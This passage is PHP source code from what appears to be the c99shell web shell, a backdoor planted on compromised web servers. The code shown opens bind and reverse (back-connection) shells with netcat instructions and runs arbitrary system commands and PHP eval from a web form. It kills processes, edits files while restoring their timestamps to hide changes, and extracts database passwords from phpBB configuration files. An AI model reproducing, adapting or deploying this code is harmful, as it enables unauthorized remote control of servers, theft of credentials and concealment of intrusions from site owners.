1620 $data = base64_decode($bndsrcs[$bind[src]]);
1621 fwrite($fp,$data,strlen($data));
1622 fclose($fp);
1623 if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
1624 $v[1] = str_replace("%path",$binpath,$v[1]);
1625 $v[1] = str_replace("%port",$bind[port],$v[1]);
1626 $v[1] = str_replace("%pass",$bind[pass],$v[1]);
1627 $v[1] = str_replace("//","/",$v[1]);
1628 $retbind = myshellexec($v[1]." > /dev/null &");
1629 sleep(5); //Timeout
1630 $sock = fsockopen("localhost",$bind[port],$errno,$errstr,5);
1631 if (!$sock) {echo "I can't connect to localhost:".$bind[port]."! I think you should configure your firewall.";}
1632 else {echo "Binding... ok! Connect to <b>".$SERVER_ADDR.":".$bind[port]."</b>! You should use NetCat©, run \"<b>nc -v ".$SERVER_ADDR." ".$bind[port]."</b>\"!<center><a href=\"".$surl."act=ps_aux&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
1633 }
1634 echo "<br>";
1635 }
1636 }
1637 if (!empty($bcsubmit))
1638 {
1639 echo "<b>Result of back connection:</b><br>";
1640 $v = $bcsrcs[$bc[src]];
1641 if (empty($v)) {echo "Unknown file!<br>";}
1642 else
1643 {
1644 $srcpath = $tmpdir.$bc[src];
1645 $w = explode(".",$bc[src]);
1646 $ext = $w[count($w)-1];
1647 unset($w[count($w)-1]);
1648 $binpath = $tmpdir.join(".",$w);
1649 if ($ext == "pl") {$binpath = $srcpath;}
1650 @unlink($srcpath);
1651 $fp = fopen($srcpath,"ab+");
1652 if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
1653 else
1654 {
1655 $data = base64_decode($bndsrcs[$bind[src]]);
1656 fwrite($fp,$data,strlen($data));
1657 fclose($fp);
1658 if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
1659 $v[1] = str_replace("%path",$binpath,$v[1]);
1660 $v[1] = str_replace("%host",$bc[host],$v[1]);
1661 $v[1] = str_replace("%port",$bc[port],$v[1]);
1662 $v[1] = str_replace("//","/",$v[1]);
1663 $retbind = myshellexec($v[1]." > /dev/null &");
1664 echo "Now script try connect to ".$bc[host].":".$bc[port]."...<br>";
1665 }
1666 }
1667 }
1668 ?><b>Binding port:</b><br><form method="POST"><input type="hidden" name="act" value="bind"><input type="hidden" name="d" value="<? echo $d; ?>">Port: <input type="text" name="bind[port]" value="<?php echo htmlspecialchars($bind[port]); ?>"> Password: <input type="text" name="bind[pass]" value="<?php echo htmlspecialchars($bind[pass]); ?>"> <select name="bind[src]"><?php
1669foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind[src]) {echo " selected";} echo ">".$v[0]."</option>";}
1670?></select> <input type="submit" name="bindsubmit" value="Bind"></form>
1671<b>Back connection:</b><br><form method="POST"><input type="hidden" name="act" value="bind"><input type="hidden" name="d" value="<? echo $d; ?>">HOST: <input type="text" name="bc[host]" value="<?php echo htmlspecialchars($bc[host]); ?>"> Port: <input type="text" name="bc[port]" value="<?php echo htmlspecialchars($bc[port]); ?>"> <select name="bc[src]"><?php
1672foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc[src]) {echo " selected";} echo ">".$v[0]."</option>";}
1673?></select> <input type="submit" name="bcsubmit" value="Connect"></form>
1674Click "Connect" only after open port for it. You should use NetCat©, run "<b>nc -l -n -v -p <port></b>"!<?php
1675 }
1676}
1677if ($act == "cmd")
1678{
1679 if (!empty($submit))
1680 {
1681 echo "<b>Result of execution this command</b>:<br>";
1682 $tmp = ob_get_contents();
1683 $olddir = realpath(".");
1684 @chdir($d);
1685 if ($tmp)
1686 {
1687 ob_clean();
1688 myshellexec($cmd);
1689 $ret = ob_get_contents();
1690 $ret = convert_cyr_string($ret,"d","w");
1691 ob_clean();
1692 echo $tmp;
1693 if ($cmd_txt)
1694 {
1695 $rows = count(explode("
1696",$ret))+1;
1697 if ($rows < 10) {$rows = 10;}
1698 echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
1699 }
1700 else {echo $ret;}
1701 }
1702 else
1703 {
1704 if ($cmd_txt)
1705 {
1706 echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
1707 myshellexec($cmd);
1708 echo "</textarea>";
1709 }
1710 else {echo $ret;}
1711 }
1712 @chdir($olddir);
1713 }
1714 else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = true;}}
1715 echo "<form action=\"".$surl."act=cmd\" method=\"POST\"><textarea name=\"cmd\" cols=\"122\" rows=\"10\">".htmlspecialchars($cmd)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" name=\"submit\" value=\"Execute\"> Display in text-area <input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
1716}
1717if ($act == "ps_aux")
1718{
1719 echo "<b>Processes:</b><br>";
1720 if ($win) {echo "This function not work in Windows!<br><br>";}
1721 else
1722 {
1723 if ($pid)
1724 {
1725 if (!$sig) {$sig = 9;}
1726 echo "Sending signal ".$sig." to #".$pid."... ";
1727 $ret = posix_kill($pid,$sig);
1728 if ($ret) {echo "ok. he is dead, amen.";}
1729 else {echo "ERROR. Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";}
1730 }
1731 $ret = `ps -aux`;
1732 if (!$ret) {echo "Can't execute \"ps -aux\"!";}
1733 else
1734 {
1735 $ret = htmlspecialchars($ret);
1736 $ret = str_replace(" "," ",$ret);
1737 while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}
1738 $prcs = explode("\n",$ret);
1739 $head = explode(" ",$prcs[0]);
1740 $head[] = "ACTION";
1741 unset($prcs[0]);
1742 echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
1743 echo "<tr border=\"1\">";
1744 foreach ($head as $v) {echo "<td><b> ".$v."</b> </td>";}
1745 echo "</tr>";
1746 foreach ($prcs as $line)
1747 {
1748 if (!empty($line))
1749 {
1750 echo "<tr>";
1751 $line = explode(" ",$line);
1752 $line[10] = join(" ",array_slice($line,10,count($line)));
1753 $line = array_slice($line,0,11);
1754 $line[] = "<a href=\"".$surl."act=ps_aux&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
1755 foreach ($line as $v) {echo "<td> ".$v." </td>";}
1756 echo "</tr>";
1757 }
1758 }
1759 echo "</table>";
1760 }
1761 }
1762}
1763if ($act == "eval")
1764{
1765 if (!empty($eval))
1766 {
1767 echo "<b>Result of execution this PHP-code</b>:<br>";
1768 $tmp = ob_get_contents();
1769 $olddir = realpath(".");
1770 @chdir($d);
1771 if ($tmp)
1772 {
1773 ob_clean();
1774 eval($eval);
1775 $ret = ob_get_contents();
1776 $ret = convert_cyr_string($ret,"d","w");
1777 ob_clean();
1778 echo $tmp;
1779 if ($eval_txt)
1780 {
1781 $rows = count(explode("
1782",$ret))+1;
1783 if ($rows < 10) {$rows = 10;}
1784 echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
1785 }
1786 else {echo $ret;}
1787 }
1788 else
1789 {
1790 if ($eval_txt)
1791 {
1792 echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
1793 eval($eval);
1794 echo "</textarea>";
1795 }
1796 else {echo $ret;}
1797 }
1798 @chdir($olddir);
1799 }
1800 else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = true;}}
1801 echo "<form method=\"POST\"><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" value=\"Execute\"> Display in text-area <input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
1802}
1803if ($act == "f")
1804{
1805 $r = @file_get_contents($d.$f);
1806 if (!is_readable($d.$f) and $ft != "edit")
1807 {
1808 if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
1809 else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
1810 }
1811 else
1812 {
1813 $ext = explode(".",$f);
1814 $c = count($ext)-1;
1815 $ext = $ext[$c];
1816 $ext = strtolower($ext);
1817 $rft = "";
1818 foreach($ftypes as $k=>$v)
1819 {
1820 if (in_array($ext,$v)) {$rft = $k; break;}
1821 }
1822 if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
1823 if (empty($ft)) {$ft = $rft;}
1824 $arr = array(
1825array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
1826array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
1827array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
1828array("Code","code"),
1829array("Session","phpsess"),
1830array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
1831array("SDB","sdb"),
1832array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
1833array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
1834array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
1835array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
1836array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
1837);
1838 echo "<b>Viewing file: <img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\"> ".$f." (".view_size(filesize($d.$f)).") ";
1839 if (is_writable($d.$f)) {echo "<font color=\"green\">full read/write access (".view_perms(fileperms($d.$f)).")</font>";}
1840 else {echo "<font color=\"red\">Read-Only (".view_perms(fileperms($d.$f)).")</font>";}
1841 echo "</b><br>Select action/file-type:<br>";
1842 foreach($arr as $t)
1843 {
1844 if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=\"green\">".$t[0]."</font></a>";}
1845 elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
1846 else
1847 {
1848 echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";
1849 }
1850 echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
1851 }
1852 echo "<hr size=\"1\" noshade>";
1853 if ($ft == "info")
1854 {
1855 echo "<b>Information:</b>";
1856 echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
1857 echo "<tr class=tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr>";
1858 echo "<tr class=tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
1859 if (!$win)
1860 {
1861 echo "<tr class=tr><td><b>Owner/Group</b></td><td> ";
1862 $tmp=posix_getpwuid(fileowner($d.$f));
1863 if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
1864 else echo $tmp['name']." ";
1865 $tmp=posix_getgrgid(filegroup($d.$f));
1866 if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
1867 else echo $tmp['name'];
1868 }
1869 echo "<tr class=tr><td><b>Perms</b></td><td>";
1870
1871 if (is_writable($d.$f))
1872 {
1873 echo "<font color=\"green\">".view_perms(fileperms($d.$f))."</font>";
1874 }
1875 else
1876 {
1877 echo "<font>".view_perms(fileperms($d.$f))."</font>";
1878 }
1879 echo "</td></tr>";
1880 echo "<tr class=tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>";
1881 echo "<tr class=tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>";
1882 echo "<tr class=tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>";
1883 echo "</table><br>";
1884 $fi = fopen($d.$f,"rb");
1885 if ($fi)
1886 {
1887 if ($fullhexdump)
1888 {
1889 echo "<b>FULL HEXDUMP</b>";
1890 $str=fread($fi,filesize($d.$f));
1891 }
1892 else
1893 {
1894 echo "<b>HEXDUMP PREVIEW</b>";
1895 $str=fread($fi,$hexdump_lines*$hexdump_rows);
1896 }
1897 $n=0;
1898 $a0="00000000<br>";
1899 $a1="";
1900 $a2="";
1901 for ($i=0; $i<strlen($str); $i++)
1902 {
1903 $a1.=sprintf("%02X",ord($str[$i])).' ';
1904 switch (ord($str[$i]))
1905 {
1906 case 0: $a2.="<font class=s2>0</font>"; break;
1907 case 32:
1908 case 10:
1909 case 13: $a2.=" "; break;
1910 default: $a2.=htmlspecialchars($str[$i]);
1911 }
1912 $n++;
1913 if ($n == $hexdump_rows)
1914 {
1915 $n = 0;
1916 if ($i+1<strlen($str)) {$a0.=sprintf("%08X",$i+1)."<br>";}
1917 $a1.="<br>";
1918 $a2.="<br>";
1919 }
1920 }
1921 //if ($a1!="") {$a0.=sprintf("%08X",$i)."<br>";}
1922 echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4 ".
1923 "class=sy><tr><td bgcolor=#666666> $a0</td><td bgcolor=000000>".
1924 "$a1</td><td bgcolor=000000>$a2</td></tr></table><br>";
1925 }
1926 $encoded = "";
1927 if ($base64 == 1)
1928 {
1929 echo "<b>Base64 Encode</b><br>";
1930 $encoded = base64_encode($r);
1931 }
1932 elseif($base64 == 2)
1933 {
1934 echo "<b>Base64 Encode + Chunk</b><br>";
1935 $encoded = chunk_split(base64_encode($r));
1936 }
1937 elseif($base64 == 3)
1938 {
1939 echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
1940 $encoded = base64_encode($r);
1941 $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
1942 }
1943 elseif($base64 == 4)
1944 {
1945 }
1946 if (!empty($encoded))
1947 {
1948 echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
1949 }
1950 echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
1951 <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>] </nobr>
1952 <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>] </nobr>
1953 <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>] </nobr>
1954 <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>] </nobr>
1955 <P>";
1956 }
1957 elseif ($ft == "html")
1958 {
1959 if ($white) {@ob_clean();}
1960 echo $r;
1961 if ($white) {exit;}
1962 }
1963 elseif ($ft == "txt")
1964 {
1965 echo "<pre>".htmlspecialchars($r)."</pre>";
1966 }
1967 elseif ($ft == "ini")
1968 {
1969 echo "<pre>";
1970 var_dump(parse_ini_file($d.$f,true));
1971 echo "</pre>";
1972 }
1973 elseif ($ft == "phpsess")
1974 {
1975 echo "<pre>";
1976 $v = explode("|",$r);
1977 echo $v[0]."<br>";
1978 var_dump(unserialize($v[1]));
1979 echo "</pre>";
1980 }
1981 elseif ($ft == "exe")
1982 {
1983 echo "<form action=\"".$surl."act=cmd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"".htmlspecialchars($r)."\"><input type=\"submit\" name=\"submit\" value=\"Execute\"> <input type=\"submit\" value=\"View&Edit command\"></form>";
1984 }
1985 elseif ($ft == "sdb")
1986 {
1987 echo "<pre>";
1988 var_dump(unserialize(base64_decode($r)));
1989 echo "</pre>";
1990 }
1991 elseif ($ft == "code")
1992 {
1993 if (ereg("phpBB 2.(.*) auto-generated config file",$r))
1994 {
1995 $arr = explode("
1996",$r);
1997 if (count($arr == 18))
1998 {
1999 include($d.$f);
2000 echo "<b>phpBB configuration is detected in this file!<br>";
2001 if ($dbms == "mysql4") {$dbms = "mysql";}
2002 if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."\"><b><u>Connect to DB</u></b></a><br><br>";}
2003 else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell";}
2004 echo "Parameters for manual connect:<br>";
2005 $cfgvars = array(
2006 "dbms"=>$dbms,
2007 "dbhost"=>$dbhost,
2008 "dbname"=>$dbname,
2009 "dbuser"=>$dbuser,
2010 "dbpasswd"=>$dbpasswd
2011 );
2012 foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
2013
2014 echo "</b>";
2015 echo "<hr size=\"1\" noshade>";
2016 }
2017 }
2018 echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: #808080;\">";
2019 if (!empty($white)) {@ob_clean();}
2020 if ($rehtml) {$r = rehtmlspecialchars($r);}
2021 $r = stripslashes($r);
2022 $strip = false;
2023 if(!strpos($r,"<?") && substr($r,0,2)!="<?") {$r="<?php\n".trim($r)."\n?>"; $r = trim($r); $strip = true;}
2024 $r = @highlight_string($r, TRUE);
2025 if ($delspace) {$buffer = str_replace (" ", " ", $r);}
2026 echo $r;
2027 if (!empty($white)) {exit;}
2028 echo "</div>";
2029 }
2030 elseif ($ft == "download")
2031 {
2032 @ob_clean();
2033 header("Content-type: c99shell");
2034 header("Content-disposition: attachment; filename=\"".$f."\";");
2035 echo($r);
2036 exit;
2037 }
2038 elseif ($ft == "notepad")
2039 {
2040 @ob_clean();
2041 header("Content-type: text/plain");
2042 header("Content-disposition: attachment; filename=\"".$f.".txt\";");
2043 echo($r);
2044 exit;
2045 }
2046 elseif ($ft == "img")
2047 {
2048 if (!$white)
2049 {
2050 echo "<center><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" border=\"1\"></center>";
2051 }
2052 else
2053 {
2054 @ob_clean();
2055 $ext = explode($f,".");
2056 $ext = $ext[count($ext)-1];
2057 header("Content-type: image/gif");
2058 echo($r);
2059 exit;
2060 }
2061 }
2062 elseif ($ft == "edit")
2063 {
2064 if (!empty($submit))
2065 {
2066 if ($filestealth) {$stat = stat($d.$f);}
2067 if (!is_writable($d.$f) and $autochmod) {@chmod($d.$f,$autochmod);}
2068 $fp = fopen($d.$f,"w");
2069 if (!$fp) {echo "<b>Can't write to file!</b>";}
2070 else
2071 {
2072 echo "<b>Saved!</b>";
2073 fwrite($fp,$nfcontent);
2074 fclose($fp);
2075 if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
2076 $r = $nfcontent;
2077 }
2078 }
2079 $rows = count(explode("
2080",$r));
2081 if ($rows < 10) {$rows = 10;}
2082 if ($rows > 30) {$rows = 30;}
2083 echo "<form method=\"POST\"><input type=\"submit\" name=\"submit\" value=\"Save\"> <input type=\"reset\" value=\"Reset\"> <input type=\"button\" onclick=\"location.href='".addslashes($surl."act=".$dspact."&d=".substr($d,0,strlen($d)-1))."';\" value=\"Back\"><br><textarea name=\"nfcontent\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
2084 }
2085 elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
2086 else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
2087 }
2088}
2089if ($act == "phpinfo")
2090{
2091 ob_end_clean();
2092 phpinfo();
2093 exit;
2094}
2095} $data = base64_decode("PGNlbnRlcj48Yj5DcmVkaXRzOjxicj5JZGVhLCBsZWFkaW5nIGFuZCBjb2RpbmcgYnkgdHJpc3RyYW1bQ0NUZWFNXS48YnI+QmV0YS10ZXN0aW5nIGFuZCBzb21lIHRpcHMgLSBOdWtMZW9OIFtBblRpU2hAUmUgdEVhTV0uPGJyPlRoYW5rcyBhbGwgd2hvIHJlcG9ydCBidWdzLjxicj5BbGwgYnVncyBzZW5kIHRvIHRyaXN0cmFtJ3MgSUNRICM2NTY1NTUgPGEgaHJlZj0iaHR0cDovL3d3cC5pY3EuY29tL3NjcmlwdHMvY29udGFjdC5kbGw/bXNndG89NjU2NTU1Ij48aW1nIHNyYz1odHRwOi8vd3dwLmljcS5jb20vc2NyaXB0cy9vbmxpbmUuZGxsP2ljcT02NTY1NTUmaW1nPTUgYm9yZGVyPTAgYWxpZ249YWJzbWlkZGxlPjwvYT4uPC9iPiA8L2NlbnRlcj4gwOLy7vAg4vvw4Obg5fIg4evg4+7k4PDt7vHy/CDu5O3u7PMg7/Du4vMg6u7y7vD76SDu8urr/vfo6yDl4+4g7eAg7OXx//Yg7vIg6O3l8uAsIOgg5Ov/IPLu4+4g9/LuLeH7IO3lIPPs5fDl8vwg7vIg8erz6ugg7/Do+Ovu8fwg8+Pr8+Ho8vzx/yDiIO/w7uPw4Ozs6PDu4uDt6OUuIM/u5PLu6+rt8+vgIOog7eDv6PHg7ej+IOvl7fwg8SDq7vLu8O7pIP8g8+/w4OLr/+sg8eXw4uXw4OzoLjxjZW50ZXI+PGI+z/Dg4ujr4DwvYj46PC9jZW50ZXI+IDxiPsL7IOzu5uXy5SDo5+zl7f/y/CDv8O7j8ODs7PMg7+4gwuD45ezzIPPx7O7y8OXt6P4sIOzl7f/y/CDt4PHy8O7p6ugsIOTo5+Dp7S4uLiDt7iDl8evoIML7LCDz4uDm4OXs++ksIPPk4Ovo8uUg6OvoIPLl7CDh7uvl5SDo5+zl7ejy5SDq7u/o8ODp8vssIPLuIP8g4fPk8yDi++3z5uTl7SDu8u7w4uDy/CDi4Owg/+n24C4gPC9iPjxicj7A4vLu8CDt5SDt5fG48iDu8uLl8vHy4uXt7e7x8ugg5+Ag4u7n7O7m7fvpIOLw5eQsIO3g7eXxuO376SD98u7pIO/w7uPw4Ozs7uksIPIu6i4g7u3gIO/w5eTu8fLg4uvl7eAg8u7r/OruIOTr/yDu5+3g6u7s6+Xt6P8u");
2096if ($act == "img")
2097{
2098 @ob_clean();
2099
2100 $arrimg = array(
2101"arrow_ltr"=>
2102"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
2103"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
2104"back"=>
2105"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
2106"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
2107"Wg0JADs=",
2108"buffer"=>
2109"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
2110"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
2111"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
2112"change"=>
2113"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
2114"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
2115"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
2116"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
2117"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
2118"zMshADs=",
2119"delete"=>
2120"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
2121"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
2122"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
2123"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
2124"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
2125"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2126"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
2127"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
2128"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
2129"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
2130"jwVFHBgiEGQFIgQasYkcSbJQIAA7",
2131"download"=>
2132"R0lGODlhDwAQAJECAAAAAP///////wAAACH5BAEAAAIALAAAAAAPABAAQAIslI8pAOH/WGoQqMOC".
2133"vAtqxIReuC1UZHGLapAhdzqpEn9Y7Wlplpc3ynqxWAUAOw==",
2134"edit"=>
2135"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
2136"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
2137"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
2138"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
2139"forward"=>
2140"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
2141"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
2142"WqsJADs=",
2143"home"=>
2144"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
2145"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
2146"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
2147"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
2148"mode"=>
2149"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
2150"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
2151"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
2152"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
2153"refresh"=>
2154"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
2155"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
2156"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
2157"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
2158"search"=>
2159"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
2160"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
